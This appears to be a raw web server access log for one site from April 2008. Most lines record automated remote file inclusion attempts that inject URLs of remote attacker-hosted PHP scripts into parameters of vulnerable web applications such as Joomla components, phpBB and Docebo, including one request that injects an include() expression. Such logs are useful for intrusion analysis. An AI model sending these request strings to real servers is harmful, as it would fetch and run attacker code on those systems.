69.20.57.43 - - [17/Apr/2008:13:37:29 -0700] "GET /logs/doceboLms/class/class.admin_menu_lms.php?where_framework=http://fourstarpizza.net/media/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
222.255.3.68 - - [17/Apr/2008:13:37:36 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://199k.info/krix/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.255.3.68 - - [17/Apr/2008:13:37:39 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://199k.info/krix/sistem.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
222.255.3.68 - - [17/Apr/2008:13:37:41 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://199k.info/krix/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.255.3.68 - - [17/Apr/2008:13:37:50 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://199k.info/krix/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:13:37:51 -0700] "GET //config.inc.php?path_escape=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "dmulk.com"
217.195.114.88 - - [17/Apr/2008:13:37:51 -0700] "GET /logs//config.inc.php?path_escape=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:38:02 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:38:05 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:38:06 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [17/Apr/2008:13:38:10 -0700] "GET /logs/access_080329.log/file_upload.php?sbp=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.155.227.84 - - [17/Apr/2008:13:38:15 -0700] "GET /logs/access_080221.log//display.php?page=&lang=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:38:31 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.96.27.5 - - [17/Apr/2008:13:39:17 -0700] "GET /logs/access_080219.log/main.php?site=http://lineagezone.no-ip.org/je/sp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.96.27.5 - - [17/Apr/2008:13:39:18 -0700] "GET /main.php?site=http://lineagezone.no-ip.org/je/sp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.96.27.5 - - [17/Apr/2008:13:39:18 -0700] "GET /logs/main.php?site=http://lineagezone.no-ip.org/je/sp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.199.198.79 - - [17/Apr/2008:13:40:05 -0700] "GET /logs/access_080321.log HTTP/1.0" 200 365679 "http://www.altavista.com/web/results?itag=ody&pg=aq&aqmode=s&aqa=%2B64+++++guestbook++++++%27%272008%27%27&aqp=@&aqo=yahoo.com%2C+aol.com%2C++hotmail.com&aqn=&kgs=0&kls=0&dt=tmperiod&d2=0&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=1980&dto%5Bd%5D=17&dto%5Bm%5D=4&dto%5By%5D=2008&filetype=text&rc=dmn&swd=&lh=&nbq=50" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.1)" "www.dmulk.com"
69.72.149.26 - - [17/Apr/2008:13:40:09 -0700] "GET /logs/errors.php?error=http://www.buyindianproducts.com/includes/font/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.72.149.26 - - [17/Apr/2008:13:40:10 -0700] "GET /errors.php?error=http://www.buyindianproducts.com/includes/font/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
67.195.37.115 - - [17/Apr/2008:13:40:19 -0700] "GET /logs/access.log HTTP/1.0" 200 327744 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.185.237.35 - - [17/Apr/2008:13:40:42 -0700] "GET /logs/access.log//settings.inc.php?include_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [17/Apr/2008:13:40:42 -0700] "GET //settings.inc.php?include_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [17/Apr/2008:13:40:43 -0700] "GET /logs//settings.inc.php?include_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:40:59 -0700] "GET /logs/access_080219.log//templates/mangobery/footer.sample.php?Site_Path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:40:59 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:41:00 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.35 - - [17/Apr/2008:13:41:01 -0700] "GET /logs/access_080321.log//settings.inc.php?include_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.70.133.38 - - [17/Apr/2008:13:41:27 -0700] "GET /logs/access.log//trans/trans.php?trans=ko&page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:41:29 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.160.165 - - [17/Apr/2008:13:42:18 -0700] "GET /errors.php?error=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
216.55.160.165 - - [17/Apr/2008:13:42:22 -0700] "GET /logs/errors.php?error=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:42:26 -0700] "GET /logs/access_080313.log//templates/mangobery/footer.sample.php?Site_Path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.147.66 - - [17/Apr/2008:13:43:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.z3roadster.it/home/css.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
207.44.147.66 - - [17/Apr/2008:13:43:33 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.z3roadster.it/home/css.txt? HTTP/1.1" 200 4139 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
81.199.198.79 - - [17/Apr/2008:13:43:51 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 1095122 "http://www.altavista.com/web/results?itag=ody&pg=aq&aqmode=s&aqa=%2B64+++++guestbook++++++%27%272008%27%27&aqp=@&aqo=yahoo.com%2C+aol.com%2C++hotmail.com&aqn=&kgs=0&kls=0&dt=tmperiod&d2=0&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=1980&dto%5Bd%5D=17&dto%5Bm%5D=4&dto%5By%5D=2008&filetype=text&rc=dmn&swd=&lh=&nbq=50" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.1)" "www.dmulk.com"
66.212.23.249 - - [17/Apr/2008:13:45:50 -0700] "GET /logs//?mosConfig_absolute_path=http://keirafans.net/img/test.txt? HTTP/1.1" 200 43557 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.212.23.249 - - [17/Apr/2008:13:45:51 -0700] "GET //?mosConfig_absolute_path=http://keirafans.net/img/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
216.55.160.165 - - [17/Apr/2008:13:46:40 -0700] "GET /logs/errors.php?error=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "dmulk.com"
216.55.160.165 - - [17/Apr/2008:13:46:40 -0700] "GET /errors.php?error=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "dmulk.com"
64.185.237.35 - - [17/Apr/2008:13:46:48 -0700] "GET /logs/access_080113.log/startdown.php?file=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [17/Apr/2008:13:46:48 -0700] "GET /startdown.php?file=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.35 - - [17/Apr/2008:13:46:48 -0700] "GET /logs/startdown.php?file=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.92.150.60 - - [17/Apr/2008:13:49:06 -0700] "GET /logs/access_080308.log/sitemap.xml.php?mosConfig_absolute_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.150.60 - - [17/Apr/2008:13:49:06 -0700] "GET /sitemap.xml.php?mosConfig_absolute_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.150.60 - - [17/Apr/2008:13:49:07 -0700] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:49:21 -0700] "GET /logs/access_080213.log/components/com_performs/performs.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
74.53.73.178 - - [17/Apr/2008:13:51:24 -0700] "GET /logs/index.php?x=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.53.73.178 - - [17/Apr/2008:13:51:26 -0700] "GET /index.php?x=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:13:51:28 -0700] "GET /logs/access.log//template.php?pagina=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:13:51:28 -0700] "GET //template.php?pagina=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:13:51:29 -0700] "GET /logs//template.php?pagina=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:53:20 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:53:21 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:53:21 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.148.225 - - [17/Apr/2008:13:54:04 -0700] "GET /index2.php?page=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
82.165.148.225 - - [17/Apr/2008:13:54:04 -0700] "GET /logs/index2.php?page=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:13:54:16 -0700] "GET /logs/?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 43552 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:13:54:17 -0700] "GET /?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.64.50.43 - - [17/Apr/2008:13:54:54 -0700] "GET /errors.php?error=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.64.50.43 - - [17/Apr/2008:13:54:54 -0700] "GET /logs/errors.php?error=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:55:36 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:55:36 -0700] "GET //ashnews.php?pathtoashnews=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:55:36 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:56:18 -0700] "GET /logs/access_080315.log//atom.php5?page=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:56:18 -0700] "GET //atom.php5?page=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:56:18 -0700] "GET /logs//atom.php5?page=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:57:39 -0700] "GET /logs/access_080329.log//atom.php5?page=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:58:08 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:58:09 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:58:09 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:13:58:45 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:00:47 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:00:47 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:00:47 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:00:53 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:14:04:51 -0700] "GET /logs/access_071217.log/step_one.php?server_inc=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:14:04:52 -0700] "GET /step_one.php?server_inc=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:14:04:52 -0700] "GET /logs/step_one.php?server_inc=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:05:01 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:05:01 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:05:01 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.201.13.98 - - [17/Apr/2008:14:05:32 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.sghummeltal.de//components/com_simpleboard/uploaded/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
67.201.13.98 - - [17/Apr/2008:14:05:34 -0700] "GET //index.php?option=com_custompages&cpage=http://www.sghummeltal.de//components/com_simpleboard/uploaded/tetas.jpg?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.6.17.182 - - [17/Apr/2008:14:05:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.151 - - [17/Apr/2008:14:05:46 -0700] "GET / HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:06:50 -0700] "GET /logs/access_080312.log//claroline/phpbb/page_tail.php?includePath=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:06:50 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:06:50 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:06:50 -0700] "GET /logs/access_080312.log//claroline/tracking/userLog.php?rootSys=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:06:50 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:06:51 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:07:02 -0700] "GET /logs/access_080226.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:07:09 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:07:09 -0700] "GET //citywriter/head.php?path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:07:09 -0700] "GET /logs//citywriter/head.php?path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.123.66.136 - - [17/Apr/2008:14:07:26 -0700] "GET /errors.php?error=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
202.123.66.136 - - [17/Apr/2008:14:07:26 -0700] "GET /logs/errors.php?error=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:14:07:28 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:14:07:28 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:14:07:28 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:14:07:28 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.107 - - [17/Apr/2008:14:08:19 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.230 - - [17/Apr/2008:14:08:20 -0700] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.129.86 - - [17/Apr/2008:14:08:22 -0700] "GET /logs/access_080103.log/index1.php?site=http://www.systel.ru/phpbb2//language/lang_german/mail.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:08:42 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:08:42 -0700] "GET //config/dbutil.bck.php?confdir=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:08:43 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:14:09:35 -0700] "GET /logs/access.log//view.php?table=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:14:09:35 -0700] "GET //view.php?table=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.188.9.9 - - [17/Apr/2008:14:09:35 -0700] "GET /logs//view.php?table=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
